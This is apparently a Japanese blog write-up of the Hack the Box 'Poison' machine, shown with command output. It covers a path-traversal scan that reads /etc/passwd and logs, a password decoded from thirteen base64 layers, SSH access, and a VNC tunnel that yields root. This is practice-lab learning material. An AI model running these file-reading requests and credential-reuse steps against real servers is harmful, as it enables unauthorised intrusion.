さんぽしの散歩記

【Hack the Box write-up】Poison

May 28, 2020

はじめに

筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machine について

難易度は初の medium です スクリーンショット 2020-05-28 10.55.56.png

medium の中では簡単な方の machine です

nmap

kali@kali:~$ nmap -sV -sC 10.10.10.84
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-27 22:05 EDT
Nmap scan report for 10.10.10.84
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.82 seconds

80 番ポート

スクリーンショット 2020-05-28 11.11.02.png

適当に打ってみます

スクリーンショット 2020-05-28 11.11.26.png

LFI の匂いがプンプンしますね…

LFI2RCE

https://github.com/takabaya-shi/LFI2RCE

kali@kali:~/LFI2RCE$ python lfi2rce.py --linux 10.10.10.84 /browse.php?file=../../../../../..  --error "failed to open stream" -v
                    _     _____ ___ ____  ____   ____ _____
                   | |   |  ___|_ _|___ \|  _ \ / ___| ____|
                   | |   | |_   | |  __) | |_) | |   |  _|
                   | |___|  _|  | | / __/|  _ <| |___| |___
                   |_____|_|   |___|_____|_| \_\____|_____|
SSL Enabled: False
Verify SSL: False
Host: 10.10.10.84
Base Injection Path: /browse.php?file=../../../../../..
Terminator:
LFI path: http://10.10.10.84/browse.php?file=../../../../../..<INJECTION POINT>
Error Message: failed to open stream
Loaded 56 files
Progress: 0%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/passwd
LFI Success! /etc/passwd file found.
Progress: 1%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/shadow
Progress: 3%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/issue
Progress: 5%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/group
LFI Success! /etc/group file found.
Progress: 7%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/hostname
Progress: 8%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/ssh/ssh_config
LFI Success! /etc/ssh/ssh_config file found.
Progress: 10%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/ssh/sshd_config
LFI Success! /etc/ssh/sshd_config file found.
Progress: 12%
Testing http://10.10.10.84/browse.php?file=../../../../../../root/.ssh/id_rsa
Progress: 14%
Testing http://10.10.10.84/browse.php?file=../../../../../../root/.ssh/authorized_keys
Progress: 16%
Testing http://10.10.10.84/browse.php?file=../../../../../../home/None/.ssh/authorized_keys
Progress: 17%
Testing http://10.10.10.84/browse.php?file=../../../../../../home/None/.ssh/id_rsa
Progress: 19%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/apache2/apache2.conf
Progress: 21%
Testing http://10.10.10.84/browse.php?file=../../../../../../usr/local/etc/apache2/httpd.conf
Progress: 23%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/httpd/conf/httpd.conf
Progress: 25%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/httpd/access_log
Progress: 26%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache2/access.log
Progress: 28%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/httpd-access.log
LFI Success! /var/log/httpd-access.log file found.
Progress: 30%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache/access.log
Progress: 32%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache/error.log
Progress: 33%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache2/access.log
Progress: 35%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache/error.log
Progress: 37%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/lib/mysql/mysql/usr.frm
Progress: 39%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/lib/mysql/user.MYD
Progress: 41%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/lib/mysql/user.MYI
Progress: 42%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache/logs/error.log
Progress: 44%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache/logs/access.log
Progress: 46%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/httpd/logs/acces_log
Progress: 48%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/httpd/logs/acces.log
Progress: 50%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/httpd/logs/error_log
Progress: 51%
Testing http://10.10.10.84/browse.php?file=../../../../../../etc/httpd/logs/error.log
Progress: 53%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/www/logs/access_log
Progress: 55%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/www/logs/access.log
Progress: 57%
Testing http://10.10.10.84/browse.php?file=../../../../../../usr/local/apache/logs/access_log
Progress: 58%
Testing http://10.10.10.84/browse.php?file=../../../../../../usr/local/apache/logs/access.log
Progress: 60%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/www/logs/error_log
Progress: 62%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/www/logs/error.log
Progress: 64%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/access_log
Progress: 66%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/access.log
Progress: 67%
Testing http://10.10.10.84/browse.php?file=../../../../../../usr/local/apache/logs/error_log
Progress: 69%
Testing http://10.10.10.84/browse.php?file=../../../../../../usr/local/apache/logs/error.log
Progress: 71%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache/error_log
Progress: 73%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/apache2/error_log
Progress: 75%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/error_log
Progress: 76%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/error.log
Progress: 78%
Testing http://10.10.10.84/browse.php?file=../../../../../../proc/self/environ
Progress: 80%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/vsftpd.log
Progress: 82%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/sshd.log
Progress: 83%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/log/auth.log
Progress: 85%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/mail
Progress: 87%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/spool/mail
Progress: 89%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/spool/mail/rpc
Progress: 91%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/mail/rpc
Progress: 92%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/mail/root
Progress: 94%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/spool/mail/root
Progress: 96%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/mail/None
Progress: 98%
Testing http://10.10.10.84/browse.php?file=../../../../../../var/spool/mail/None
Following files found!!!
/etc/passwd
/etc/group
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/var/log/httpd-access.log

/etc/passwd

スクリーンショット 2020-05-28 16.40.07.png

listfiles.php

スクリーンショット 2020-05-28 11.11.02.png Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.phpとあります。

listfiles.php を開いてみます。

スクリーンショット 2020-05-28 16.41.17.png

pwdbackup.txt が怪しいですね

スクリーンショット 2020-05-28 16.41.51.png

pwdbackup.txt を解読

This password is secure, it's encoded atleast 13 times.. what could go wrong really.. Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO Ukd4RVdub3dPVU5uUFQwSwo=

脳筋なので素直に base64 -d を 13 回かけます

kali@kali:~$ cat pwd.txt | tr -d ' ' |  base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d
Charix!2#4%6&8(0

出てきました。

先ほどの/etc/passwd を見てみると charix というユーザーがいることが確認できるのでそのユーザーの password な気がしますね

ssh

kali@kali:~$ ssh [email protected]
The authenticity of host '10.10.10.84 (10.10.10.84)' can't be established.
ECDSA key fingerprint is SHA256:rhYtpHzkd9nBmOtN7+ft0JiVAu8qnywLb48Glz4jZ8c.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.84' (ECDSA) to the list of known hosts.
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.
To repeat the last command in the C shell, type "!!".
                -- Dru <[email protected]>
charix@Poison:~ %

これで user.txt が取れます

調査

charix@Poison:~ % ls
secret.zip      user.txt
charix@Poison:~ % unzip secret.zip
Archive:  secret.zip
 extracting: secret |
unzip: Passphrase required for this entry

passphrase が必要と言われますが、なんか FreeBSD の unzip で password を指定する方法がよくわからなかったので scp で kali に落とします。

kali@kali:~$ scp [email protected]:~/secret.zip ./
Password for charix@Poison:
secret.zip                                                                                                                                                                                               100%  166     0.7KB/s   00:00
kali@kali:~$ unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password:
 extracting: secret
kali@kali:~$ file secret
secret: Non-ISO extended-ASCII text, with no line terminators

unzip で出てきた内容はよく読めない謎ファイルでした。

sockstat を使う

sockstat は Linux で言う所の ss と似たようなコマンドらしいです。

charix@Poison:~ % sockstat -4 -l -P tcp
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
www      httpd      782   4  tcp4   *:80                  *:*
www      httpd      774   4  tcp4   *:80                  *:*
root     sendmail   657   3  tcp4   127.0.0.1:25          *:*
www      httpd      656   4  tcp4   *:80                  *:*
www      httpd      655   4  tcp4   *:80                  *:*
www      httpd      654   4  tcp4   *:80                  *:*
www      httpd      653   4  tcp4   *:80                  *:*
www      httpd      652   4  tcp4   *:80                  *:*
root     httpd      638   4  tcp4   *:80                  *:*
root     sshd       620   4  tcp4   *:22                  *:*
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*

5901, 5801 あたりがなんとなく怪しげですね

reverse SSH tunnel

https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Linux/linux_commands.md#reverse-ssh-tunnel

kali@kali:~$ ssh -L 5901:localhost:5901 [email protected]

また 5901 は VNC というものによく用いられるポートだそうです。 http://www14.plala.or.jp/campus-note/vine_linux/server_vnc/vnc_portforwarding.html

vncviewer というコマンドで接続します。

ここでは Charix!2#4%6&8(0 は使えませんでした。 先ほどの secret を使用します。

kali@kali:~$ vncviewer localhost:5901 -passwd secret
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

S__80109570.jpg

root が取れました!

終わりに

medium の中では簡単な machine ですが root まで取れたのでよかったです。🏃‍♂️

このエントリーをはてなブックマークに追加